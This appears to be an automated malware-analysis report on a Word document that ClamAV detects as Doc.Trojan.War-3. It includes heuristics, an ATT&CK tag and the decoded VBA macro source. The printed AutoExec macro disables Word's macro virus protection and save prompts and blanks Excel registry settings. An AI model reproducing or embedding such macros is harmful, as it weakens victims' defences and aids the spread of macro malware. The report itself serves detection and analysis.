MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The AutoExec subroutine attempts to disable macro virus protection and modify Excel settings, indicating a potential attempt to prepare the system for further malicious activity. The ClamAV detection as 'Doc.Trojan.War-3' further supports its malicious nature.
Heuristics 2
-
ClamAV: Doc.Trojan.War-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.War-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 758 bytes |
SHA-256: 3cd7940abbfde71a255026e3dfc804d007f9f619973d3cb35b3120c078058c63 |
|||
|
Detection
ClamAV:
Doc.Trojan.War-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec()
On Error Resume Next
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.